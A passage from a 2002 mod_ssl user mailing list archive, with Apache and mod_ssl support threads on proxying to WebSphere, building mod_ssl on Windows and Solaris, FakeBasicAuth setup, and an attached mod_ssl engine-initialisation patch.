... (websphere does evrything here ... )

and so i need to share information on the server between 
mod_app_server and mod_ssl ...
(it works on Iplanet ... i need the same fonctionnality)

but i don't knew how i could use mod_proxy 
so ... thanxs a lot anyway :)


---------- Original Message ----------------------------------
From: "Marco A. Zamora Cunningham" 
Reply-To: modssl-users@modssl.org
Date:  Tue, 16 Jul 2002 17:32:47 -0500

>> >You'll have to either get IBM to provide you with an EAPI-compiled
>> >WebSphere DSO or set up two copies of Apache, one SSL and 
>> one non-SSL.
>> 
>> yes i've think about this (when i was testing)
>> but the point is : I need to provide Https pages with Websphere
>> and i need to use Apache as "front" server
>
>You can always put up the SSL-aware Apache in front of the non-SSL Websphere
>one:
>
>Config inside the "frontmost" SSL Apache:
>  ProxyPass          /  http://127.0.01:/
>  ProxyPassReverse   /  http://127.0.01:/
>
>And set up the "backend" Websphere one to listen only on the loopback
>interface:
>  Listen 127.0.0.1:
>
>(Obviously, substitute  with whatever port you'd like
>it to listen on.)
>
>Additionally, if you really need to see the IP of the connecting client on
>the backend server (for example, so your access logs show the real IP), you
>can do a little trick with mod_perl (provided, of course, you've got
>mod_perl on both servers):
>
>On the "front" SSL server (single line in case it wraps)[1]:
>
>  PerlHeaderParserHandler "sub
>{my($r)=shift;$r->headers_in->add('X-Forwarded-For'=>$r->connection->remote_
>ip())}"
>
>On the "back" Websphere server (also on a single line)[2]:
>
>  PerlHeaderParserHandler "sub
>{my($r)=shift;$r->connection->remote_ip((split(/,\s*/,$r->headers_in->merge(
>'X-Forwarded-For')))[-1])}"
>
>In case there isn't mod_perl on the backend server, there might be some
>other way to act on the standard proxying "X-Forwarded-For" header (maybe
>websphere can do it by itself?).
>
>Hope it helps...			Marco Zamora
>
>[1] Note for mod_perl-heads: Yes, it really is "$r->headers_in". Remember
>that on proxy connections, the INcoming headers are the ones forwarded on to
>the target server.
>
>[2] The fancy "(split[...]merge)[-1]" stuff is just a way of parsing out the
>*last* IP in the possible chain of X-Forwarded-For headers. We can't just
>use the header_in method because it returns the first one.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 12:43:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA06742; Wed, 17 Jul 2002 12:42:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id MAA06710; Wed, 17 Jul 2002 12:41:35 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KK77T9AZK0000QX2@mdx.ac.uk> for modssl-users@modssl.org; Wed,
 17 Jul 2002 11:41:27 +0100 (BST)
Received: from mdx-he-staff2.nw.mdx.ac.uk
 (mdx-he-staff2.mdx.ac.uk [158.94.88.6]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KK77T9273Q000MQL@mdx.ac.uk> for modssl-users@modssl.org; Wed,
 17 Jul 2002 11:41:27 +0100 (BST)
Received: from MDX-HE-STAFF2/SpoolDir by mdx-he-staff2.nw.mdx.ac.uk
 (Mercury 1.48); Wed, 17 Jul 2002 11:37:44 +0000
Received: from SpoolDir by MDX-HE-STAFF2 (Mercury 1.48); Wed,
 17 Jul 2002 11:37:27 +0000
Received: from [1] (158.94.89.74) by mdx-he-staff2.nw.mdx.ac.uk (Mercury 1.48)
 with ESMTP; Wed, 17 Jul 2002 11:37:20 +0000
Date: Wed, 17 Jul 2002 11:37:20 +0100
From: Alex Moon 
Subject: Failure to load mod_ssl under NT/apache 2.0
To: modssl-users@modssl.org
Message-id: 
Organization: Middlesex University
MIME-version: 1.0
X-Mailer: Pegasus Mail for Win32 (v3.12a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Moon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've been trying to get apache 2.0.39 +modssl to work under winNT. 
 But i am failing at what seems like the first hurdle i.e. i cannot seem to get the 
apache mod_ssl.so module to load.  It comes up with the following:

Cannot load C:/apache2/modules/mod_ssl.so into server: The operating 
system cannot run %1

Any ideas greatfully received as I cannot see what I have done 
wrong,  

Alex


Technical Manager
Online Learning Support Unit
Middlesex University Business School

a.moon@mdx.ac.uk
020 8411 5092

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 14:33:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA12665; Wed, 17 Jul 2002 14:32:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id OAA12575; Wed, 17 Jul 2002 14:31:24 +0200 (MET DST)
Date: Wed, 17 Jul 2002 05:37:07 -0700
Message-Id: <200207170537.AA2007040044@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: RE: Failure to load mod_ssl under NT/apache 2.0
X-Mailer: 
X-IMSTrailer: __IMail_5__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

---------- Original Message ----------------------------------
From: Alex Moon 
Reply-To: modssl-users@modssl.org
Date:  Wed, 17 Jul 2002 11:37:20 +0100

>I've been trying to get apache 2.0.39 +modssl to work under winNT. 
> But i am failing at what seems like the first hurdle i.e. i cannot seem to get the 
>apache mod_ssl.so module to load.  It comes up with the following:

with apache 1.3.2* under windows (not cygwin) you had to load .DDL 
and  not .SO

maybe it a way to search
>Cannot load C:/apache2/modules/mod_ssl.so into server: The operating 
>system cannot run %1
>
>Any ideas greatfully received as I cannot see what I have done 
>wrong,  
>
>Alex
>
>
>Technical Manager
>Online Learning Support Unit
>Middlesex University Business School
>
>a.moon@mdx.ac.uk
>020 8411 5092
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 15:24:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA15323; Wed, 17 Jul 2002 15:23:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts6-srv.bellnexxia.net id PAA15301; Wed, 17 Jul 2002 15:22:34 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.173]) by tomts6-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020717132211.JTAB8251.tomts6-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 17 Jul 2002 09:22:11 -0400
Message-ID: <3D356F9D.2030404@sympatico.ca>
Date: Wed, 17 Jul 2002 09:22:37 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Failure to load mod_ssl under NT/apache 2.0
References: <200207170537.AA2007040044@lopette.org>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

arcean wrote:
> ---------- Original Message ----------------------------------
> From: Alex Moon 
> Reply-To: modssl-users@modssl.org
> Date:  Wed, 17 Jul 2002 11:37:20 +0100
> 
> 
>>I've been trying to get apache 2.0.39 +modssl to work under winNT. 
>>But i am failing at what seems like the first hurdle i.e. i cannot seem to get the 
>>apache mod_ssl.so module to load.  It comes up with the following:
> 
> 
> with apache 1.3.2* under windows (not cygwin) you had to load .DDL 
> and  not .SO
> 
> maybe it a way to search
> 
>>Cannot load C:/apache2/modules/mod_ssl.so into server: The operating 
>>system cannot run %1
>>
>>Any ideas greatfully received as I cannot see what I have done 
>>wrong,  
>>
>>Alex
>>
>>
>>Technical Manager
>>Online Learning Support Unit
>>Middlesex University Business School
>>
>>a.moon@mdx.ac.uk
>>020 8411 5092
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
> 
> 
> 
> __________________________________________________
> D O T E A S Y - "Join the web hosting revolution!"
>              http://www.doteasy.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

I have not done this for several weeks and maybe the distribution has 
changed, but...

mod_ssl.so was not built with Apache 1.0.39

...you have to build it.

1. place openssl into ?:\httpd-2.0.39\srclib ... there are instructions 
somewhere to follow...
2. follow the instructions in openssl and build it ... you need masm7, 
perl, vc6, etc.
3. build apache ... it finds openssl and builds mod_ssl.so ... you need 
awk, bison, sed and flex (new cygwin)

... I had to get newer version of cygwin before it worked, but then the 
newer perl was a problem.
... older perl must be in path before cygwin

After it all comes to gether you can use nmake -f makefile.win installr

Then I had trouble making certs...

Try these hints ... I will make more detailed instructions later if 
needed but I think the newer packages (must) probably work better than 
what I used ... but I have not checked.

I will have to download new source and try again to know what the 
situation is and I am sorry but I have to run off to work.  Later, ok?

Chris.





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 17:08:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA21708; Wed, 17 Jul 2002 17:07:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id RAA21688; Wed, 17 Jul 2002 17:06:57 +0200 (MET DST)
Date: Wed, 17 Jul 2002 08:12:39 -0700
Message-Id: <200207170812.AA705298848@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: Re: Failure to load mod_ssl under NT/apache 2.0
X-Mailer: 
X-IMSTrailer: __IMail_5__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

---------- Original Message ----------------------------------
From: hunter 
Reply-To: modssl-users@modssl.org
Date:  Wed, 17 Jul 2002 09:22:37 -0400

>arcean wrote:
>> ---------- Original Message ----------------------------------
>> From: Alex Moon 
>> Reply-To: modssl-users@modssl.org
>> Date:  Wed, 17 Jul 2002 11:37:20 +0100
>> 
>> 
>>>I've been trying to get apache 2.0.39 +modssl to work under winNT. 
>>>But i am failing at what seems like the first hurdle i.e. i cannot seem to get the 
>>>apache mod_ssl.so module to load.  It comes up with the following:
>> 
>> 
>> with apache 1.3.2* under windows (not cygwin) you had to load .DDL 
>> and  not .SO
>> 
>> maybe it a way to search
>> 
[over load sniped ... ]

I said :
"with apache 1.3.2* under windows (not cygwin) you had 
to load .DDL"
             ^^^^^^                ^^^^^^^^^^^
not cygwin, native win32 if you prefer (with DLL)
1.3.2* like 1.3.20 or 1.3.26 ... not 1.0.39 
(not sure it existes)

i know my english is bad but ....

with cygwin i never try 

>I have not done this for several weeks and maybe the distribution has 
>changed, but...
>
>mod_ssl.so was not built with Apache 1.0.39
>
>...you have to build it.
>
>1. place openssl into ?:\httpd-2.0.39\srclib ... there are instructions 
>somewhere to follow...
>2. follow the instructions in openssl and build it ... you need masm7, 
>perl, vc6, etc.
>3. build apache ... it finds openssl and builds mod_ssl.so ... you need 
>awk, bison, sed and flex (new cygwin)
>
>... I had to get newer version of cygwin before it worked, but then the 
>newer perl was a problem.
>... older perl must be in path before cygwin
>
>After it all comes to gether you can use nmake -f makefile.win installr
>
>Then I had trouble making certs...
>
>Try these hints ... I will make more detailed instructions later if 
>needed but I think the newer packages (must) probably work better than 
>what I used ... but I have not checked.
>
>I will have to download new source and try again to know what the 
>situation is and I am sorry but I have to run off to work.  Later, ok?
>
>Chris.
>
>
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 18:35:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA26399; Wed, 17 Jul 2002 18:34:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA26345; Wed, 17 Jul 2002 18:33:37 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6E4124CE73E; Wed, 17 Jul 2002 18:33:36 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CF4132874C; Wed, 17 Jul 2002 16:06:14 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from x509security.com id MAA06301; Wed, 17 Jul 2002 12:31:50 +0200 (MET DST)
Received: from x509security (root@localhost [127.0.0.1])
	by x509security.com (8.12.1/8.12.1) with SMTP id g6HAVjvO014117
	for ; Wed, 17 Jul 2002 20:31:47 +1000 (EST)
Message-ID: <00ec01c22d7b$7cdd4b20$0200a8c0@x509security>
From: "Oliver Bode" 
To: 
Subject: fakebasicauth documentation is *wrong* and doesn't work for me
Date: Wed, 17 Jul 2002 20:19:49 +1000
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Oliver Bode" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I can't get fakebasicauth to work. The documentation is *wrong* and doesn't
work for me.

Can someone show me how I can set this up as I am sick of enerting my
authentication details for my certificate everytime I look at a file in a
secured directory?

>From the howto http://www.modssl.org/docs/2.8/ssl_howto.html:

SSLVerifyClient      none

SSLVerifyClient      require
SSLVerifyDepth       5
SSLCACertificateFile conf/ssl.crt/ca.crt
SSLCACertificatePath conf/ssl.crt
SSLOptions           +FakeBasicAuth
SSLRequireSSL
AuthName             "Snake Oil Authentication"
AuthType             Basic
AuthUserFile         /usr/local/apache/conf/httpd.passwd
require              valid-user


Note that the SSLCACertificateFile and SSLCACertificatePath are *inside* a
 when it states in
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC14

that the context of these directives are in:  server config, virtual host

Also from the howto:
/C=DE/L=Munich/O=Snake Oil, Ltd./OU=Staff/CN=Foo:xxj31ZMTZzkVA
/C=US/L=S.F./O=Snake Oil, Ltd./OU=CA/CN=Bar:xxj31ZMTZzkVA
/C=US/L=L.A./O=Snake Oil, Ltd./OU=Dev/CN=Quux:xxj31ZMTZzkVA

What is "xxj31ZMTZzkVA" ?

This string is not what I get when I use htpasswrd with the password as
"password"  I get:KI5eE8rTJvs.U and when I use the -m switch I get:
$apr1$KujN4/..$exMhWW135aqs/4cQbZJ2v/

Not that it matters because with whatever I use I just get forbidden !

Does it work for anybody ?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 18:43:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA26993; Wed, 17 Jul 2002 18:42:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA26956; Wed, 17 Jul 2002 18:41:37 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 680974CE74E; Wed, 17 Jul 2002 18:41:36 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 004D028693; Wed, 17 Jul 2002 18:39:53 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sfoexh01.yipes.com id RAA23827; Wed, 17 Jul 2002 17:48:50 +0200 (MET DST)
Received: by sfoexh01.yipes.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 17 Jul 2002 08:45:15 -0700
Message-ID: <9C67F3C3FD4F3A43BB64A7C60871DC3F31CD87@sfoexh01.yipes.com>
From: David Loesche 
To: "'modssl-users@modssl.org'" 
Subject: RE: I am having a heck of a time - Please help. -- SOLUTION FOUND
	!
Date: Wed, 17 Jul 2002 08:45:09 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Loesche 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Building Apache with EAPI, DSO enabled, mod_ssl and mm is a very simple
task. I do not know why it took so long to figure out. You simply following
the instructions in the mod_ssl install documentation (or other helpful
documents you can find these all over the web), and your up and running with
Apache - EAPI, DSO, mod_ssl, etc. running.

WRONG!  Not on Solaris 8.  It seems that if you build Apache on Solaris 2.6
with gcc 2.95 all is well.  Simply following the instructions in the mod_ssl
documentation and your done.  But it's another story if you are using
Solaris 8 (I am not sure about 7 or 9 - I do have time to try it on these).
After many hours of frustration and numerous emails I finally decided to try
every combination one-by-one to identify which one was the culprit.

Initial environment:

Solaris 8
Gcc 3.0.3
Apache 1.3.26
Mod_ssl-2.8.10-1.3.26
mm-1.1.3
openssl-0.9.6d

The only way this combination works is with -enable-rule=SHARED_CORE. This
option "forces" Apache to export the share symbols so they are available at
run time.  This takes a 5% performance hit and since the previous build did
not have it I assumed I was doing something wrong.  So I tried every
possible build configuration over and over - No change (I had to use the
SHARE_CORE rule).  I even tried this on Apache 2.0.39 and 1.3.20 (the
previous build version here of Apache).  No matter what I did I could not
get it to build the same way as the previous version. More work to do...

2nd shot:

Solaris 8
Gcc 2.95.3
Apache 1.3.26
Mod_ssl-2.8.10-1.3.26
mm-1.1.3
openssl-0.9.6d

EVENTS AND SOLUTION:

Same as above.  More work to do...

Last shot:

Solaris 8
Gcc 3.1
Apache 1.3.26
Mod_ssl-2.8.10-1.3.26
mm-1.1.3
openssl-0.9.6d

Worked just like all the documentation said it should have and everyone I
contacted told me to do (which I had spend over a week reading and trying
all these suggestions).  As it turns out, either the build from
sunfreeware.com for gcc 2.95 & 3.0.3 have an issue with the loader module,
the building of shared libraries, or gcc has an issue.  So, if any of you
have to do this make sure you have gcc 3.1 or SUN's compiler (I believe
SUN's works but did not try it - I guess I'm just stubborn). 

Later,



-----Original Message-----
From: David Loesche 
Sent: Monday, July 15, 2002 12:07 PM
To: 'modssl-users@modssl.org'
Subject: RE: I am having a heck of a time - Please help.

I did read the referred document concerning the build phase.  I am intrigued
by the LD_LIBRARY_PATH suggestion.  What would you recommend I set it to?

-----Original Message-----
From: Boyle Owen [mailto:Owen.Boyle@swx.com]
Sent: Monday, July 15, 2002 12:51 AM
To: modssl-users@modssl.org
Subject: RE: I am having a heck of a time - Please help.

Could be to do with your version of openssl lib (check it is reasonably up
to date) or with your LD_LIBRARY_PATH environment variable..

Check out http://www.delouw.ch/linux/Apache-Compile-HOWTO/html/apache.html

for a good user's summary.

Rgds,

Owen Boyle

>-----Original Message-----
>From: David Loesche [mailto:DLoesche@yipes.com]
>Sent: Freitag, 12. Juli 2002 20:12
>To: 'modssl-users@modssl.org'
>Subject: I am having a heck of a time - Please help.
>
>
>I have poured through all the documentation I can find on
>enabling mod_ssl
>with Apache 1.3.26 but keep coming up short.  If I static link
>the mod_ssl
>it works fine but when I try to enable DSO and use it as a
>shared library I
>keep getting ap_add_config_define : referenced symbol not
>found.  I have the
>following config setup for the apache build:
>
>#!/bin/ksh
>SSL_BASE=/usr/local/ssl \
>EAPI_MM=../mm-1.1.3 \
>EAPI_MM_CORE_PATH=logs/httpd.mm \
>LIBS=/usr/lib/libC.so.5 \
>CFLAGS=-fPIC \
>./configure    --prefix=/opt/apache \
>               --enable-rule=EAPI \
>               --enable-module=ssl \
>               --enable-shared=ssl \
>               --disable-rule=SSL_COMPAT \
>               --enable-rule=SSL_SDBM \
>               --enable-suexec \
>               --suexec-caller=http
>
>I have followed the instructions in the modssl install guide to patch
>Apache.  Please verify the following build for mod_ssl:
>
>./configure    --with-apache=../apache_1.3.26 \
>               --with-ssl=/usr/local/ssl \
>               --with-mm=../mm-1.1.3
>
>If you can help (point me to some documentation) I would be
>very grateful...
>
>
>David S. Loesche
>david.loesche@yipes.com                        Yipes
>Communications, Inc.
>Main:  (415) 901-2000                  114 Sansome Street, Suite 1045
>Direct:        (415) 901-2210                  San Francisco, CA 94104
>Fax:   (415) 901-2201                  http://www.yipes.com
>
>Yipes is the defining provider of fully scalable bandwidth for
>businesses.
>We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
>services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps
>increments.
>
>Yipes delivers this uniquely flexible service over the first nationwide
>system of optical IP networks.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 18:53:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28853; Wed, 17 Jul 2002 18:52:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id SAA28499; Wed, 17 Jul 2002 18:51:16 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA13131
	for ; Wed, 17 Jul 2002 12:53:21 -0400
Date: Wed, 17 Jul 2002 12:53:21 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: modssl with a shared ssl lib base
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Since apache 2.0.X will not function with older kernels, we have been
trying to upgrade to apache_1.3.26 and wheen out of reliance for present
upon the mod_blowchunks.so thing we have implimented till time permitted.
But, we had decided to build ssl-engine with shared capability, so as to
not have to jump through hoops if matters with apache 2.0.X changed and
such.  But, we are failing to get a working httpd when going this route.
I'm wondering if the older apache fails, at least on older kernels, when
ssl has been compiled as an so?

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 17 19:48:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA01777; Wed, 17 Jul 2002 19:47:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id TAA01766; Wed, 17 Jul 2002 19:47:02 +0200 (MET DST)
Subject: [PATCH]
Date: Wed, 17 Jul 2002 19:46:46 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C22DB9.EB8953DD"
Message-ID: 
X-MS-Has-Attach: yes
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: [PATCH]
Thread-Index: AcItuTpBWwSEKvZQRPeJW5cTpBHvOg==
From: "Frederic DONNAT" 
To: 
Cc: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C22DB9.EB8953DD
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_002_01C22DB9.EB8953DD"


------_=_NextPart_002_01C22DB9.EB8953DD
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Hi all,=20

I Geoff suggest it i post a diff file for OpenSSL ENGINE RAND_METHOD =
setting.
(diff -urN ...) this is for mod_ssl-2.8.10-1.3.26 tarballs.

Geoff comment:
"ssl_init_SSLLibrary() must be seeding the PRNG, and thus initialising =
the set-on-first-use pointer in openssl to a default RAND_METHOD."

Cause i'm not working with modssl CVS it's just a diff beetween two =
directories (mod_ssl-xxx-orig the original one and mod_ssl-xxx the =
corrected one).

The has been successfully tested for older version of mod_ssl with older =
apache. The oldest i test is for apache-1.3.20.
Nothing has been tryed or tested under apache-2.0.x.

reghards
Fred



------_=_NextPart_002_01C22DB9.EB8953DD
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable






[PATCH]





Hi all,



I Geoff suggest it i post a diff file for OpenSSL ENGINE RAND_METHOD =
setting.

(diff -urN ...) this is for mod_ssl-2.8.10-1.3.26 tarballs.



Geoff comment:

"ssl_init_SSLLibrary() must be seeding the PRNG, and thus =
initialising the set-on-first-use pointer in openssl to a default =
RAND_METHOD."



Cause i'm not working with modssl CVS it's just a diff beetween two =
directories (mod_ssl-xxx-orig the original one and mod_ssl-xxx the =
corrected one).



The has been successfully tested for older version of mod_ssl with older =
apache. The oldest i test is for apache-1.3.20.

Nothing has been tryed or tested under apache-2.0.x.



reghards

Fred









------_=_NextPart_002_01C22DB9.EB8953DD--

------_=_NextPart_001_01C22DB9.EB8953DD
Content-Type: application/octet-stream;
	name="mod_ssl-2.8.10-1.3.26.diff"
Content-Transfer-Encoding: base64
Content-Description: mod_ssl-2.8.10-1.3.26.diff
Content-Disposition: attachment;
	filename="mod_ssl-2.8.10-1.3.26.diff"

ZGlmZiAtdXJOIG1vZF9zc2wtMi44LjEwLTEuMy4yNi1vcmlnL3BrZy5zc2xtb2Qvc3NsX2VuZ2lu
ZV9pbml0LmMgbW9kX3NzbC0yLjguMTAtMS4zLjI2L3BrZy5zc2xtb2Qvc3NsX2VuZ2luZV9pbml0
LmMKLS0tIG1vZF9zc2wtMi44LjEwLTEuMy4yNi1vcmlnL3BrZy5zc2xtb2Qvc3NsX2VuZ2luZV9p
bml0LmMJTW9uIEp1biAyNCAxMjo0Mjo0OSAyMDAyCisrKyBtb2Rfc3NsLTIuOC4xMC0xLjMuMjYv
cGtnLnNzbG1vZC9zc2xfZW5naW5lX2luaXQuYwlXZWQgSnVsIDE3IDE5OjM3OjMzIDIwMDIKQEAg
LTIzMCw2ICsyMzAsMTMgQEAKICAgICAgKiAgT2ssIG5vdyB0cnkgdG8gc29sdmUgdGhpcyB0b3Rh
bGx5IHVnbHkgc2l0dWF0aW9uLi4uCiAgICAgICovCiAKKyAgICAvKgorICAgICAqIFNTTCBleHRl
cm5hbCBjcnlwdG8gZGV2aWNlICgiZW5naW5lIikgc3VwcG9ydAorICAgICAqLworI2lmZGVmIFNT
TF9FWFBFUklNRU5UQUxfRU5HSU5FCisgICAgc3NsX2luaXRfRW5naW5lKHMsIHApOworI2VuZGlm
